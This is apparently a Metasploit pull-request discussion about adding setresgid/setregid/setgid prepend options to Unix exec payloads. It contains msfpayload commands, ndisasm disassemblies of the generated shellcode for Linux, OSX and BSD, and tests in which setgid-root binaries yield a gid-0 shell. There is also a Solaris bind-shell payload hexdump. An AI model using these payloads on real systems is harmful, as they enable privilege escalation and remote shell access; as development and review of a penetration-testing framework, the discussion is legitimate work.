add PrependSet[re]gid support for unix* payloads

[mephos]

No description provided.

[jvazquez-r7]

Looked at the linux x86 case. Disass looks good:

$ ./msfpayload linux/x86/exec CMD=/bin/bash PrependSetresgid=true PrependSetregid=true PrependSetgid=true R > exec_sh.raw 
ndisasm exec_sh.raw 
00000000  31C9              xor cx,cx // PrependSetresgid
00000002  31DB              xor bx,bx
00000004  F7E3              mul bx
00000006  B0AA              mov al,0xaa
00000008  CD80              int 0x80
0000000A  31C9              xor cx,cx // PrependSetregid
0000000C  31DB              xor bx,bx
0000000E  6A47              push byte +0x47
00000010  58                pop ax
00000011  CD80              int 0x80
00000013  31DB              xor bx,bx // PrependSetgid
00000015  6A2E              push byte +0x2e
00000017  58                pop ax
00000018  CD80              int 0x80
0000001A  6A0B              push byte +0xb // Shellcode
0000001C  58                pop ax
0000001D  99                cwd
0000001E  52                push dx
0000001F  66682D6389E7      push dword 0xe789632d
00000025  682F73            push word 0x732f
00000028  680068            push word 0x6800
0000002B  2F                das
0000002C  62696E            bound bp,[bx+di+0x6e]
0000002F  89E3              mov bx,sp
00000031  52                push dx
00000032  E80A00            call word 0x3f
00000035  0000              add [bx+si],al
00000037  2F                das
00000038  62696E            bound bp,[bx+di+0x6e]
0000003B  2F                das
0000003C  626173            bound sp,[bx+di+0x73]
0000003F  680057            push word 0x5700
00000042  53                push bx
00000043  89E1              mov cx,sp
00000045  CD80              int 0x80

And the test on Debian 6 was successfull:

juan@debiansmb:~$ ls -la exec_sh.elf 
-rwsr-sr-x 1 root root 155 Oct 11 12:27 exec_sh.elf
juan@debiansmb:~$ id
uid=1000(juan) gid=1000(juan) groups=1000(juan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),109(bluetooth),115(scanner)
juan@debiansmb:~$ ./exec_sh.elf 
bash-4.1$ id
uid=1000(juan) gid=0(root) groups=1000(juan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),109(bluetooth),115(scanner)

[jvazquez-r7]

The Linux case for x86_64 platforms also looks good for me:

The output for:

./msfpayload linux/x64/exec CMD=/bin/bash PrependSetresgid=true PrependSetregid=true PrependSetgid=true R > exec_64_sh.raw

is:

00000000  4831FF            xor rdi,rdi // PrependSetresgid
00000003  4889FE            mov rsi,rdi
00000006  6A77              push byte +0x77
00000008  58                pop rax
00000009  0F05              loadall286
0000000B  4831FF            xor rdi,rdi // PrependSetregid
0000000E  4889FE            mov rsi,rdi
00000011  4889F2            mov rdx,rsi
00000014  6A72              push byte +0x72
00000016  58                pop rax
00000017  0F05              loadall286
00000019  4831FF            xor rdi,rdi // PrependSetgid
0000001C  6A6A              push byte +0x6a
0000001E  58                pop rax
0000001F  0F05              loadall286
00000021  6A3B              push byte +0x3b // shellcode
00000023  58                pop rax
00000024  99                cdq
00000025  48BB2F62696E2F73  mov rbx,0x68732f6e69622f
         -6800
0000002F  53                push rbx
00000030  4889E7            mov rdi,rsp
00000033  68                db 0x68
00000034  2D63000048        sub eax,0x48000063
00000039  89E6              mov esi,esp
0000003B  52                push rdx
0000003C  E80A000000        call dword 0x4b
00000041  2F                db 0x2f
00000042  62                db 0x62
00000043  696E2F62617368    imul ebp,[rsi+0x2f],dword 0x68736162
0000004A  005657            add [rsi+0x57],dl
0000004D  4889E6            mov rsi,rsp
00000050  0F05              loadall286

And is working, tested on a ubuntu 10.04 x86_64:

test@ubuntu:~$ ls -la exec_64_sh.elf 
-rwsr-sr-x 1 root root 202 2012-10-11 04:03 exec_64_sh.elf
test@ubuntu:~$ id -G
1002 4 20 21 24 25 26 30 44 46 104
test@ubuntu:~$ ./exec_64_sh.elf 
bash-4.1$ id -G
0 4 20 21 24 25 26 30 44 46 104 1002
bash-4.1$ id -g
0

[jvazquez-r7]

On the other hand... when testing the osx x86 case:

$ ./msfpayload osx/x86/exec CMD=/bin/bash PrependSetresgid=true PrependSetregid=true PrependSetgid=true R > osx_x86.raw

There is just the shellcode, any of the prepended code is:

$ ndisasm -b 32 osx_x86.raw 
00000000  31C0              xor eax,eax
00000002  50                push eax
00000003  E80A000000        call 0x12
00000008  2F                das
00000009  62696E            bound ebp,[ecx+0x6e]
0000000C  2F                das
0000000D  626173            bound esp,[ecx+0x73]
00000010  68005E89E7        push dword 0xe7895e00
00000015  B90A000000        mov ecx,0xa
0000001A  FC                cld
0000001B  F2A4              repne movsb
0000001D  89E3              mov ebx,esp
0000001F  50                push eax
00000020  50                push eax
00000021  53                push ebx
00000022  B03B              mov al,0x3b
00000024  50                push eax
00000025  CD80              int 0x80

The same when using just the PrependSetuid option:

$ ./msfpayload osx/x86/exec CMD=/bin/bash PrependSetuid=true R > osx_x86.raw
Juans-MacBook-Pro:metasploit-framework juan$ ndisasm -b 32 osx_x86.raw 
00000000  31C0              xor eax,eax
00000002  50                push eax
00000003  E80A000000        call 0x12
00000008  2F                das
00000009  62696E            bound ebp,[ecx+0x6e]
0000000C  2F                das
0000000D  626173            bound esp,[ecx+0x73]
00000010  68005E89E7        push dword 0xe7895e00
00000015  B90A000000        mov ecx,0xa
0000001A  FC                cld
0000001B  F2A4              repne movsb
0000001D  89E3              mov ebx,esp
0000001F  50                push eax
00000020  50                push eax
00000021  53                push ebx
00000022  B03B              mov al,0x3b
00000024  50                push eax
00000025  CD80              int 0x80

I think here the problem is in exec payload module for osx x86, because it isn't including the mixin Msf::Payload::Osx, so the generate() function is not being redefined!

btw: The exe payload module is the only osx payload module which doesn't include the Msf::Payload::Osx mixin. Anyway, I'll ask a more experienced developer to review it.

[jvazquez-r7]

While testing this pull request... I'm thinking why these prepends weren't available at msf, maybe because from the exploit point of view the uid is more interesting than the guid.... anyway I'll be checking this topic with more experienced developers!

[jvazquez-r7]

In the case of BSD the prepending is working as expected:

$ ./msfpayload bsd/x86/exec CMD=/bin/bash PrependSetresgid=true PrependSetregid=true PrependSetgid=true R > exec_bsd.raw
Juans-MacBook-Pro:metasploit-framework juan$ ndisasm -b 32 exec_bsd.raw 
00000000  31C0              xor eax,eax //PrependSetresgid
00000002  50                push eax
00000003  50                push eax
00000004  50                push eax
00000005  50                push eax
00000006  66B83801          mov ax,0x138
0000000A  CD80              int 0x80
0000000C  31C0              xor eax,eax //PrependSetregid
0000000E  50                push eax
0000000F  50                push eax
00000010  50                push eax
00000011  B07F              mov al,0x7f
00000013  CD80              int 0x80
00000015  31C0              xor eax,eax //PrependSetgid
00000017  50                push eax
00000018  50                push eax
00000019  B0B5              mov al,0xb5
0000001B  CD80              int 0x80
0000001D  6A3B              push byte +0x3b //shellcode
0000001F  58                pop eax
00000020  99                cdq
00000021  52                push edx
00000022  682D630000        push dword 0x632d
00000027  89E7              mov edi,esp
00000029  52                push edx
0000002A  686E2F7368        push dword 0x68732f6e
0000002F  682F2F6269        push dword 0x69622f2f
00000034  89E3              mov ebx,esp
00000036  52                push edx
00000037  E80A000000        call 0x46
0000003C  2F                das
0000003D  62696E            bound ebp,[ecx+0x6e]
00000040  2F                das
00000041  626173            bound esp,[ecx+0x73]
00000044  6800575389        push dword 0x89535700
00000049  E152              loope 0x9d
0000004B  51                push ecx
0000004C  53                push ebx
0000004D  50                push eax
0000004E  CD80              int 0x80

And when executing:

$ ls -la exec_bsd.elf 
-rwsr-sr-x  1 root  juan  162 Oct 11 20:17 exec_bsd.elf
$ ./exec_bsd.elf 
# id -g
0
# id -gr
0

[jvazquez-r7]

I was wrong about the solaris case, its prepending the options correctly:

Juans-MacBook-Pro:metasploit-framework juan$ ./msfpayload solaris/x86/shell_bind_tcp RHOST=192.168.1.137 LPORT=4444 PrependSetregid=true R > shell_bind_solaris.raw
Juans-MacBook-Pro:metasploit-framework juan$ hexdump -C shell_bind_solaris.raw 
00000000  68 ff d8 ff 3c 6a 65 89  e6 f7 56 04 f6 16 31 c0  |h...X...O.y.Ph/|
00000060  2f 73 68 68 2f 62 69 6e  89 e3 50 53 89 e1 50 51  |/shh/bin..PS..PQ|
00000070  53 b0 3b ff d6                                    |S.;..|
00000075

The prepending code for PrependSetregid has been added successfully at offset 0xe:

31 c0 50 50 b0 cb ff d6

Sorry for the inconveniences !! My fault!

I'm just ask to a more experienced developer to do a final review of this pull request (in special the solaris case) of this pull request and #919 before merging!

[jvazquez-r7]

Finally merged :) thanks mephos!